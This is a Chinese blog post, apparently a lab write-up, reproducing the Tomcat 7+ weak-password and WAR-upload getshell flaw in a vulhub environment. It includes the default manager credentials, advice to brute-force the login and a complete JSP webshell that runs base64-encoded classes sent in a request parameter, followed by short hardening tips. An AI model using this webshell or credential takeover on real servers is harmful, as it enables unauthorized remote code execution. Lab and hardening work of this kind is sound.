Tomcat7+ 弱口令 && 后台getshell漏洞

最新推荐文章于 2024-03-06 22:19:12 发布
最新推荐文章于 2024-03-06 22:19:12 发布
阅读量416 收藏
点赞数 1
分类专栏: 日常练习 CTF 文章标签: tomcat 安全 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46684679/article/details/128211959
版权

Tomcat7+ 弱口令 && 后台getshell漏洞

🍉 === shell

此环境来自vulhub工程:
https://github.com/vulhub/vulhub

以下测试环境为ubuntu 20.04

🍉目录

环境准备

所有漏洞环境信息查询:https://vulhub.org/

# 拉取vulhub配置
git clone https://github.com/vulhub/vulhub.git

# 切换到相应漏洞路径
cd /path/to/vul

# docker-compose部署该漏洞环境
docker-compose up -d

弱密码登录

访问http://your-ip:8080/manager/html
默认账号和密码均为tomcat,可以直接登录,当然对于一般渗透的思路,这种类型的登录框建议爆破,毕竟没有验证码或口令,同时这也是需要加固的一点

war文件上传

登录成功后,发现可以使用war文件上传,将jsp一句话木马压缩为zip文件后,后缀名在改为war,就可以上传,而且貌似也没有验证机制,什么不需要考虑什么绕过问题

jsp木马来自这篇文章
这里准备使用蚁剑连接:

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

请添加图片描述

请添加图片描述

蚁剑连接

war文件成功上传后可以发现,该框架下多了一个名为上传文件名的文件夹路径
请添加图片描述
里面存放着我们上传的jsp木马文件,可以通过访问http://your-ip:8080/passwd/passwd.jsp访问这个木马

使用蚁剑连接:
请添加图片描述

加固

会利用就会加固

  • 密码需要有字符类型要求和长度
  • 增加验证码认证或口令认证等机制
  • 文件上传点增加上传限制
伽蓝之堂
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apache Tomcat 漏洞
09-27
apache Tomcat 漏洞
Tomcat7+ 弱口令 +后台getshell漏洞
m0_52701599的博客
02-17 643
Tomcat7+ 弱口令 && 后台getshell漏洞
Tomcat漏洞详解
最新发布
m0_64481831的博客
03-06 1627
Tomcat是一种轻量级的web服务器,主要负责运行jsp和Servlet具有任意文件写入漏洞:主要影响7.0-7.8左右,原因是因为配置不当问题(conf/web.xml文件的readonly参数定义为false),导致可以使用PUT方法进行任意文件上传。jsp绕过方法有斜杠绕过、空格绕过和::$DATA绕过(后两者都需要在Windows下)具有文件包含漏洞:主要影响6和8版本,7和9版本有少数;原因是因为AJP协议存在缺陷而导致攻击者可以构造任意参数来进行任意文件包含和读取文件。
Tomcat7 +弱口令&&后端Getshell漏洞
ssrf
03-14 1121
Tomcat版本:8.0 漏洞介绍: 介绍 Tomcat支持通过后端部署war文件,因此我们可以直接将webshel​​l放置到web目录中。为了访问后端,需要权限。 Tomcat7+权限分为: manager(后台管理) manager-gui 拥有html页面权限 manager-status 拥有查看status的权限 manager-script 拥有text接口的权限,和status权限 manager-jmx 拥有jmx权限,和status权限 host-manager(虚拟主机管理) a
Tomcat弱口令扫描的工具.zip
03-31
Tomcat弱口令扫描工具,可自己写字典进行爆破。
nginx+tomcat7+memcached session会话保持
08-09
基于tomcat7版本的memcached会话保持,内置tomcat需要的jar包。
Tomcat7+Redis+Session 负载之后session 共享 tomcat jar包
04-11
nignx 进行负载后session失效的完美解决,亲测可用
Tomcat7+8+9
04-09
Tomcat7+8+9Tomcat7+8+9Tomcat7+8+9Tomcat7+8+9Tomcat7+8+9Tomcat7+8+9
tomcat7+redis单点 session共享jar
03-20
tomcat7 + redis单点 session共享 jar 提供支持tomcat7 + redis单点 实现session共享的jar资源
tomcat 7.0.69 只要2分
11-19
搜了一圈tomcat 一个个分数高的要死,不知道什么行情。现提供一个低分的。
【vulhub漏洞复现】Tomcat7+弱密码&&后端Getshell漏洞-03
书山上的云的博客
01-17 3534
一、漏洞描述 Tomcat 支持通过后端部署war 文件,所以我们可以直接将webshel​​l 放到web 目录中。为了访问后端,需要权限。 Tomcat7+的权限如下: 经理(后台管理) manager-gui(html页面权限) manager-status(查看状态的权限) manager-script(文本界面权限和状态权限) manager-jmx(jmx 权限和状态权限) 主机管理器(虚拟主机管理) admin-gui(html 页面权限) admin-script(文本界面权限) 可以看出
Tomcat 弱口令 && 后台getshell漏洞
weixin_46601374的博客
04-05 7486
漏洞编号 VUL-2021040008 爆发时间 2018-10-10 漏洞简介 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 影响版本 Tomcat8.x,Tomcat7.x 漏洞详情 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) 1、manager-gui 拥
tomcat 7 任意文件上传漏洞(信息搜集与漏洞探测)
m0_67391377的博客
08-25 988
(6)抓包发现存在404报错,一个get方法,以及tomcat版本。(7)上网查tomcat漏洞,在7版本的时候存在以下漏洞。1)使用nmap -sP扫描c段网络存活主机。通过对页面浏览,得知该网站存在一个信息泄露。2)使用nmap -sS扫描端口开放。(1)查询攻击机kali的IP地址。(4)在kali中进行服务扫描验证。(5)使用nmap -O 查看系统。(2)识别存活主机,发现攻击目标。(8)对网站进行修改put测试。(10)再上传jsp一句话木马。(3)在浏览器中打开该ip。(9)访问上传的文件。
16.Tomcat弱口令 && 后台getshell漏洞
weixin_30611509的博客
11-01 377
Tomcat7+ 弱口令 && 后台getshell漏洞 Tomcat版本:8.0 环境说明 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) manager-gui 拥有html页面权限 manager-status 拥有查看...
Tomcat7部署war包getshell 漏洞复现
Boom!脑洞大爆炸的博客
07-07 834
Tomcat7部署war包getshell 漏洞复现
Tomcat 漏洞总结
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
10-09 9600
CVE-2017-12615 漏洞原理 CVE-2017-12615由于配置不当,可导致任意文件上传,影响版本:Tomcat7.0.0-7.0.81 由于配置不当,conf/web.xml中的readonly设置为flase,可导致用PUT方法上传任意文件,但限制了jsp后缀的上传 漏洞复现 使用Vulhub搭建测试环境 Vulhub - Docker-Compose file for vulnerability environment 成功启动环境 进入容器,并查看配置文件,发现r
漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞
过期的秋刀鱼
11-04 953
这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html。正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限。可见,用户tomcat拥有上述所有权限,密码是。即可跳到管理登陆页面。
tomcat弱口令复现
09-23
Tomcat后台管理用户存在弱口令时,攻击者可以利用这个漏洞来上传webshell并实施攻击。 要复现Tomcat弱口令漏洞,可以按照以下步骤进行操作: 1. 找到Tomcat安装目录下的conf/tomcat-users.xml文件。 2. 使用文本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值